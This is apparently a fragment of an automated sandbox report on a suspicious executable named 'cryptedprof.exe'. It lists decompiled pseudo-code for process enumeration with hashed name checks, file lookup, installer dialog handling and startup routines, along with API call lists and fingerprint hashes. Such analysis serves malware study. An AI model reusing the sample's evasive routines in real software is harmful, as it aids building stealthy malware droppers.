                                                                                        					if(_t25 != 0) {
                                                                                        						while(E6FC241D7( &_v544) != _a4) {
                                                                                        							if(Process32NextW(_v12,  &_v580) != 0) {
                                                                                        								continue;
                                                                                        							}
                                                                                        							return 0;
                                                                                        						}
                                                                                        						return 1;
                                                                                        					}
                                                                                        					return 0;
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}












                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6FC24260
                                                                                        • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6FC24284
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 2353314856-0
                                                                                        • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                        • Instruction ID: 13e3f2ee87e6a63454a066b9022399f06dab4a47d75d3f3862c96b8db34f7e65
                                                                                        • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                        • Instruction Fuzzy Hash: 0F112770D00219BFDB10DFB1CD49AAEBBF8FF00304F1045A5E919E5091F7325A959B51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004065C1(CHAR* _a4) {
                                                                                        				void* _t2;
                                                                                        
                                                                                        				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
                                                                                        				if(_t2 == 0xffffffff) {
                                                                                        					return 0;
                                                                                        				}
                                                                                        				FindClose(_t2);
                                                                                        				return 0x42c108;
                                                                                        			}





                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(747DFA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,747DFA90,?,747DF560,00405A35,?,747DFA90,747DF560), ref: 004065CC
                                                                                        • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                        • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                        • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                        • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                        				struct HWND__* _v32;
                                                                                        				void* _v84;
                                                                                        				void* _v88;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t35;
                                                                                        				signed int _t37;
                                                                                        				signed int _t39;
                                                                                        				struct HWND__* _t49;
                                                                                        				signed int _t68;
                                                                                        				struct HWND__* _t74;
                                                                                        				signed int _t87;
                                                                                        				struct HWND__* _t92;
                                                                                        				signed int _t100;
                                                                                        				int _t104;
                                                                                        				signed int _t116;
                                                                                        				signed int _t117;
                                                                                        				int _t118;
                                                                                        				signed int _t123;
                                                                                        				struct HWND__* _t126;
                                                                                        				struct HWND__* _t127;
                                                                                        				int _t128;
                                                                                        				long _t131;
                                                                                        				int _t133;
                                                                                        				int _t134;
                                                                                        				void* _t135;
                                                                                        				void* _t143;
                                                                                        
                                                                                        				_t116 = _a8;
                                                                                        				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                        					_t35 = _a12;
                                                                                        					_t126 = _a4;
                                                                                        					__eflags = _t116 - 0x110;
                                                                                        					 *0x42a8a0 = _t35;
                                                                                        					if(_t116 == 0x110) {
                                                                                        						 *0x42f448 = _t126;
                                                                                        						 *0x42a8b4 = GetDlgItem(_t126, 1);
                                                                                        						_t92 = GetDlgItem(_t126, 2);
                                                                                        						_push(0xffffffff);
                                                                                        						_push(0x1c);
                                                                                        						 *0x429880 = _t92;
                                                                                        						E004042D1(_t126);
                                                                                        						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28); // executed
                                                                                        						 *0x42ec0c = E0040140B(4);
                                                                                        						_t35 = 1;
                                                                                        						__eflags = 1;
                                                                                        						 *0x42a8a0 = 1;
                                                                                        					}
                                                                                        					_t123 =  *0x40a1f8; // 0xffffffff
                                                                                        					_t134 = 0;
                                                                                        					_t131 = (_t123 << 6) +  *0x42f480;
                                                                                        					__eflags = _t123;
                                                                                        					if(_t123 < 0) {
                                                                                        						L34:
                                                                                        						E0040431D(0x40b);
                                                                                        						while(1) {
                                                                                        							_t37 =  *0x42a8a0;
                                                                                        							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                                                        							_t131 = _t131 + (_t37 << 6);
                                                                                        							_t39 =  *0x40a1f8; // 0xffffffff
                                                                                        							__eflags = _t39 -  *0x42f484;
                                                                                        							if(_t39 ==  *0x42f484) {
                                                                                        								E0040140B(1);
                                                                                        							}
                                                                                        							__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                        							if(__eflags != 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
                                                                                        							if(__eflags >= 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t117 =  *(_t131 + 0x14);
                                                                                        							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                        							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                        							_push(0xfffffc19);
                                                                                        							E004042D1(_t126);
                                                                                        							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                        							_push(0xfffffc1b);
                                                                                        							E004042D1(_t126);
                                                                                        							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                        							_push(0xfffffc1a);
                                                                                        							E004042D1(_t126);
                                                                                        							_t49 = GetDlgItem(_t126, 3);
                                                                                        							__eflags =  *0x42f4ec - _t134;
                                                                                        							_v32 = _t49;
                                                                                        							if( *0x42f4ec != _t134) {
                                                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                        								__eflags = _t117;
                                                                                        							}
                                                                                        							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                        							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                        							E004042F3(_t117 & 0x00000002);
                                                                                        							_t118 = _t117 & 0x00000004;
                                                                                        							EnableWindow( *0x429880, _t118);
                                                                                        							__eflags = _t118 - _t134;
                                                                                        							if(_t118 == _t134) {
                                                                                        								_push(1);
                                                                                        							} else {
                                                                                        								_push(_t134);
                                                                                        							}
                                                                                        							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                        							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                        							__eflags =  *0x42f4ec - _t134;
                                                                                        							if( *0x42f4ec == _t134) {
                                                                                        								_push( *0x42a8b4);
                                                                                        							} else {
                                                                                        								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                        								_push( *0x429880);
                                                                                        							}
                                                                                        							E00404306();
                                                                                        							E0040624D(0x42a8b8, E00403DDE());
                                                                                        							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                        							SetWindowTextA(_t126, 0x42a8b8);
                                                                                        							_push(_t134);
                                                                                        							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                                        							__eflags = _t68;
                                                                                        							if(_t68 != 0) {
                                                                                        								continue;
                                                                                        							} else {
                                                                                        								__eflags =  *_t131 - _t134;
                                                                                        								if( *_t131 == _t134) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								__eflags =  *(_t131 + 4) - 5;
                                                                                        								if( *(_t131 + 4) != 5) {
                                                                                        									DestroyWindow( *0x42ec18);
                                                                                        									 *0x42a090 = _t131;
                                                                                        									__eflags =  *_t131 - _t134;
                                                                                        									if( *_t131 <= _t134) {
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                                                        									__eflags = _t74 - _t134;
                                                                                        									 *0x42ec18 = _t74;
                                                                                        									if(_t74 == _t134) {
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                        									_push(6);
                                                                                        									E004042D1(_t74);
                                                                                        									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                        									ScreenToClient(_t126, _t135 + 0x10);
                                                                                        									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                        									_push(_t134);
                                                                                        									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                                        									__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                        									if(__eflags != 0) {
                                                                                        										goto L61;
                                                                                        									}
                                                                                        									ShowWindow( *0x42ec18, 8);
                                                                                        									E0040431D(0x405);
                                                                                        									goto L58;
                                                                                        								}
                                                                                        								__eflags =  *0x42f4ec - _t134;
                                                                                        								if( *0x42f4ec != _t134) {
                                                                                        									goto L61;
                                                                                        								}
                                                                                        								__eflags =  *0x42f4e0 - _t134;
                                                                                        								if( *0x42f4e0 != _t134) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L61;
                                                                                        							}
                                                                                        						}
                                                                                        						DestroyWindow( *0x42ec18);
                                                                                        						 *0x42f448 = _t134;
                                                                                        						EndDialog(_t126,  *0x429c88);
                                                                                        						goto L58;
                                                                                        					} else {
                                                                                        						__eflags = _t35 - 1;
                                                                                        						if(_t35 != 1) {
                                                                                        							L33:
                                                                                        							__eflags =  *_t131 - _t134;
                                                                                        							if( *_t131 == _t134) {
                                                                                        								goto L61;
                                                                                        							}
                                                                                        							goto L34;
                                                                                        						}
                                                                                        						_push(0);
                                                                                        						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                                        						__eflags = _t87;
                                                                                        						if(_t87 == 0) {
                                                                                        							goto L33;
                                                                                        						}
                                                                                        						SendMessageA( *0x42ec18, 0x40f, 0, 1);
                                                                                        						__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                        						return 0 | __eflags == 0x00000000;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t126 = _a4;
                                                                                        					_t134 = 0;
                                                                                        					if(_t116 == 0x47) {
                                                                                        						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
                                                                                        					}
                                                                                        					if(_t116 == 5) {
                                                                                        						asm("sbb eax, eax");
                                                                                        						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
                                                                                        					}
                                                                                        					if(_t116 != 0x40d) {
                                                                                        						__eflags = _t116 - 0x11;
                                                                                        						if(_t116 != 0x11) {
                                                                                        							__eflags = _t116 - 0x111;
                                                                                        							if(_t116 != 0x111) {
                                                                                        								L26:
                                                                                        								return E00404338(_t116, _a12, _a16);
                                                                                        							}
                                                                                        							_t133 = _a12 & 0x0000ffff;
                                                                                        							_t127 = GetDlgItem(_t126, _t133);
                                                                                        							__eflags = _t127 - _t134;
                                                                                        							if(_t127 == _t134) {
                                                                                        								L13:
                                                                                        								__eflags = _t133 - 1;
                                                                                        								if(_t133 != 1) {
                                                                                        									__eflags = _t133 - 3;
                                                                                        									if(_t133 != 3) {
                                                                                        										_t128 = 2;
                                                                                        										__eflags = _t133 - _t128;
                                                                                        										if(_t133 != _t128) {
                                                                                        											L25:
                                                                                        											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
                                                                                        											goto L26;
                                                                                        										}
                                                                                        										__eflags =  *0x42f4ec - _t134;
                                                                                        										if( *0x42f4ec == _t134) {
                                                                                        											_t100 = E0040140B(3);
                                                                                        											__eflags = _t100;
                                                                                        											if(_t100 != 0) {
                                                                                        												goto L26;
                                                                                        											}
                                                                                        											 *0x429c88 = 1;
                                                                                        											L21:
                                                                                        											_push(0x78);
                                                                                        											L22:
                                                                                        											E004042AA();
                                                                                        											goto L26;
                                                                                        										}
                                                                                        										E0040140B(_t128);
                                                                                        										 *0x429c88 = _t128;
                                                                                        										goto L21;
                                                                                        									}
                                                                                        									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                                                        									if(__eflags <= 0) {
                                                                                        										goto L25;
                                                                                        									}
                                                                                        									_push(0xffffffff);
                                                                                        									goto L22;
                                                                                        								}
                                                                                        								_push(_t133);
                                                                                        								goto L22;
                                                                                        							}
                                                                                        							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                        							_t104 = IsWindowEnabled(_t127);
                                                                                        							__eflags = _t104;
                                                                                        							if(_t104 == 0) {
                                                                                        								goto L61;
                                                                                        							}
                                                                                        							goto L13;
                                                                                        						}
                                                                                        						SetWindowLongA(_t126, _t134, _t134);
                                                                                        						return 1;
                                                                                        					} else {
                                                                                        						DestroyWindow( *0x42ec18);
                                                                                        						 *0x42ec18 = _a12;
                                                                                        						L58:
                                                                                        						if( *0x42b8b8 == _t134) {
                                                                                        							_t143 =  *0x42ec18 - _t134; // 0x0
                                                                                        							if(_t143 != 0) {
                                                                                        								ShowWindow(_t126, 0xa);
                                                                                        								 *0x42b8b8 = 1;
                                                                                        							}
                                                                                        						}
                                                                                        						L61:
                                                                                        						return 0;
                                                                                        					}
                                                                                        				}
                                                                                        			}































                                                                                        0x004040e3
                                                                                        0x004040e3
                                                                                        0x004040e3
                                                                                        0x004040f6
                                                                                        0x0040410e
                                                                                        0x00404110
                                                                                        0x00404116
                                                                                        0x0040412b
                                                                                        0x00404118
                                                                                        0x00404121
                                                                                        0x00404123
                                                                                        0x00404123
                                                                                        0x00404131
                                                                                        0x00404142
                                                                                        0x00404153
                                                                                        0x0040415a
                                                                                        0x00404160
                                                                                        0x00404164
                                                                                        0x00404169
                                                                                        0x0040416b
                                                                                        0x00000000
                                                                                        0x00404171
                                                                                        0x00404171
                                                                                        0x00404173
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404179
                                                                                        0x0040417d
                                                                                        0x004041a2
                                                                                        0x004041a8
                                                                                        0x004041ae
                                                                                        0x004041b0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041d6
                                                                                        0x004041dc
                                                                                        0x004041de
                                                                                        0x004041e3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041e9
                                                                                        0x004041ec
                                                                                        0x004041ef
                                                                                        0x00404206
                                                                                        0x00404212
                                                                                        0x0040422b
                                                                                        0x00404231
                                                                                        0x00404235
                                                                                        0x0040423a
                                                                                        0x00404240
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040424a
                                                                                        0x00404255
                                                                                        0x00000000
                                                                                        0x00404255
                                                                                        0x0040417f
                                                                                        0x00404185
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040418b
                                                                                        0x00404191
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404197
                                                                                        0x0040416b
                                                                                        0x00404262
                                                                                        0x0040426e
                                                                                        0x00404275
                                                                                        0x00000000
                                                                                        0x00403fc5
                                                                                        0x00403fc5
                                                                                        0x00403fc8
                                                                                        0x00403ffb
                                                                                        0x00403ffb
                                                                                        0x00403ffd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403ffd
                                                                                        0x00403fca
                                                                                        0x00403fce
                                                                                        0x00403fd3
                                                                                        0x00403fd5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403fe5
                                                                                        0x00403fed
                                                                                        0x00000000
                                                                                        0x00403ff3
                                                                                        0x00403e21
                                                                                        0x00403e21
                                                                                        0x00403e25
                                                                                        0x00403e2a
                                                                                        0x00403e39
                                                                                        0x00403e39
                                                                                        0x00403e42
                                                                                        0x00403e4b
                                                                                        0x00403e56
                                                                                        0x00403e56
                                                                                        0x00403e62
                                                                                        0x00403e7e
                                                                                        0x00403e81
                                                                                        0x00403e94
                                                                                        0x00403e9a
                                                                                        0x00403f3d
                                                                                        0x00000000
                                                                                        0x00403f46
                                                                                        0x00403ea0
                                                                                        0x00403ead
                                                                                        0x00403eaf
                                                                                        0x00403eb1
                                                                                        0x00403ed0
                                                                                        0x00403ed0
                                                                                        0x00403ed3
                                                                                        0x00403ed8
                                                                                        0x00403edb
                                                                                        0x00403eeb
                                                                                        0x00403eec
                                                                                        0x00403eee
                                                                                        0x00403f24
                                                                                        0x00403f37
                                                                                        0x00000000
                                                                                        0x00403f37
                                                                                        0x00403ef0
                                                                                        0x00403ef6
                                                                                        0x00403f0f
                                                                                        0x00403f14
                                                                                        0x00403f16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403f18
                                                                                        0x00403f04
                                                                                        0x00403f04
                                                                                        0x00403f06
                                                                                        0x00403f06
                                                                                        0x00000000
                                                                                        0x00403f06
                                                                                        0x00403ef9
                                                                                        0x00403efe
                                                                                        0x00000000
                                                                                        0x00403efe
                                                                                        0x00403edd
                                                                                        0x00403ee3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403ee5
                                                                                        0x00000000
                                                                                        0x00403ee5
                                                                                        0x00403ed5
                                                                                        0x00000000
                                                                                        0x00403ed5
                                                                                        0x00403ebb
                                                                                        0x00403ec2
                                                                                        0x00403ec8
                                                                                        0x00403eca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403eca
                                                                                        0x00403e86
                                                                                        0x00000000
                                                                                        0x00403e64
                                                                                        0x00403e6a
                                                                                        0x00403e74
                                                                                        0x0040427b
                                                                                        0x00404281
                                                                                        0x00404283
                                                                                        0x00404289
                                                                                        0x0040428e
                                                                                        0x00404294
                                                                                        0x00404294
                                                                                        0x00404289
                                                                                        0x0040429e
                                                                                        0x00000000
                                                                                        0x0040429e
                                                                                        0x00403e62

                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                        • ShowWindow.USER32(?), ref: 00403E56
                                                                                        • DestroyWindow.USER32 ref: 00403E6A
                                                                                        • SetWindowLongA.USER32 ref: 00403E86
                                                                                        • GetDlgItem.USER32 ref: 00403EA7
                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                        • GetDlgItem.USER32 ref: 00403F70
                                                                                        • GetDlgItem.USER32 ref: 00403F7A
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
                                                                                        • GetDlgItem.USER32 ref: 0040408B
                                                                                        • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                        • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                        • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                                        • EnableMenuItem.USER32 ref: 004040F6
                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
                                                                                        • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                        • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 4050669955-0
                                                                                        • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                        • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                        • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                        • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 96%
                                                                                        			E00403A60(void* __eflags) {
                                                                                        				intOrPtr _v4;
                                                                                        				intOrPtr _v8;
                                                                                        				int _v12;
                                                                                        				void _v16;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				intOrPtr* _t17;
                                                                                        				void* _t25;
                                                                                        				void* _t27;
                                                                                        				int _t28;
                                                                                        				void* _t31;
                                                                                        				int _t34;
                                                                                        				int _t35;
                                                                                        				intOrPtr _t36;
                                                                                        				int _t39;
                                                                                        				char _t57;
                                                                                        				CHAR* _t59;
                                                                                        				signed char _t63;
                                                                                        				CHAR* _t74;
                                                                                        				intOrPtr _t76;
                                                                                        				CHAR* _t81;
                                                                                        
                                                                                        				_t76 =  *0x42f454;
                                                                                        				_t17 = E00406656(2);
                                                                                        				_t84 = _t17;
                                                                                        				if(_t17 == 0) {
                                                                                        					_t74 = 0x42a8b8;
                                                                                        					"1033" = 0x30;
                                                                                        					 *0x436001 = 0x78;
                                                                                        					 *0x436002 = 0;
                                                                                        					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
                                                                                        					__eflags =  *0x42a8b8;
                                                                                        					if(__eflags == 0) {
                                                                                        						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
                                                                                        					}
                                                                                        					lstrcatA("1033", _t74);
                                                                                        				} else {
                                                                                        					E004061AB("1033",  *_t17() & 0x0000ffff);
                                                                                        				}
                                                                                        				E00403D25(_t71, _t84);
                                                                                        				_t80 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                                                        				 *0x42f4e0 =  *0x42f45c & 0x00000020;
                                                                                        				 *0x42f4fc = 0x10000;
                                                                                        				if(E00405CD3(_t84, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                                                                                        					L16:
                                                                                        					if(E00405CD3(_t92, _t80) == 0) {
                                                                                        						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                        					}
                                                                                        					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                        					 *0x42ec28 = _t25;
                                                                                        					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                        						L21:
                                                                                        						if(E0040140B(0) == 0) {
                                                                                        							_t27 = E00403D25(_t71, __eflags);
                                                                                        							__eflags =  *0x42f500;
                                                                                        							if( *0x42f500 != 0) {
                                                                                        								_t28 = E00405446(_t27, 0);
                                                                                        								__eflags = _t28;
                                                                                        								if(_t28 == 0) {
                                                                                        									E0040140B(1);
                                                                                        									goto L33;
                                                                                        								}
                                                                                        								__eflags =  *0x42ec0c; // 0x0
                                                                                        								if(__eflags == 0) {
                                                                                        									E0040140B(2);
                                                                                        								}
                                                                                        								goto L22;
                                                                                        							}
                                                                                        							ShowWindow( *0x42a898, 5); // executed
                                                                                        							_t34 = E004065E8("RichEd20"); // executed
                                                                                        							__eflags = _t34;
                                                                                        							if(_t34 == 0) {
                                                                                        								E004065E8("RichEd32");
                                                                                        							}
                                                                                        							_t81 = "RichEdit20A";
                                                                                        							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
                                                                                        							__eflags = _t35;
                                                                                        							if(_t35 == 0) {
                                                                                        								GetClassInfoA(0, "RichEdit", 0x42ebe0);
                                                                                        								 *0x42ec04 = _t81;
                                                                                        								RegisterClassA(0x42ebe0);
                                                                                        							}
                                                                                        							_t36 =  *0x42ec20; // 0x0
                                                                                        							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
                                                                                        							E004039B0(E0040140B(5), 1);
                                                                                        							return _t39;
                                                                                        						}
                                                                                        						L22:
                                                                                        						_t31 = 2;
                                                                                        						return _t31;
                                                                                        					} else {
                                                                                        						_t71 =  *0x42f440;
                                                                                        						 *0x42ebe4 = E00401000;
                                                                                        						 *0x42ebf0 =  *0x42f440;
                                                                                        						 *0x42ebf4 = _t25;
                                                                                        						 *0x42ec04 = 0x40a210;
                                                                                        						if(RegisterClassA(0x42ebe0) == 0) {
                                                                                        							L33:
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						}
                                                                                        						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                        						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
                                                                                        						goto L21;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t71 =  *(_t76 + 0x48);
                                                                                        					_t86 = _t71;
                                                                                        					if(_t71 == 0) {
                                                                                        						goto L16;
                                                                                        					}
                                                                                        					_t74 = 0x42e3e0;
                                                                                        					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
                                                                                        					_t57 =  *0x42e3e0; // 0x43
                                                                                        					if(_t57 == 0) {
                                                                                        						goto L16;
                                                                                        					}
                                                                                        					if(_t57 == 0x22) {
                                                                                        						_t74 = 0x42e3e1;
                                                                                        						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
                                                                                        					}
                                                                                        					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                        					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                        						L15:
                                                                                        						E0040624D(_t80, E00405BE5(_t74));
                                                                                        						goto L16;
                                                                                        					} else {
                                                                                        						_t63 = GetFileAttributesA(_t74);
                                                                                        						if(_t63 == 0xffffffff) {
                                                                                        							L14:
                                                                                        							E00405C2C(_t74);
                                                                                        							goto L15;
                                                                                        						}
                                                                                        						_t92 = _t63 & 0x00000010;
                                                                                        						if((_t63 & 0x00000010) != 0) {
                                                                                        							goto L15;
                                                                                        						}
                                                                                        						goto L14;
                                                                                        					}
                                                                                        				}
                                                                                        			}


























                                                                                        APIs
                                                                                          • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                          • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                        • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,747DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cryptedprof.exe" ,00000000), ref: 00403ADB
                                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,747DFA90), ref: 00403B50
                                                                                        • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
